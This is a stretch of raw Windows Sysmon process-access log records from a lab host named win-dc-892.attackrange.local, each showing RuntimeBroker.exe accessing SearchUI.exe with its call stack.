12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.617{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 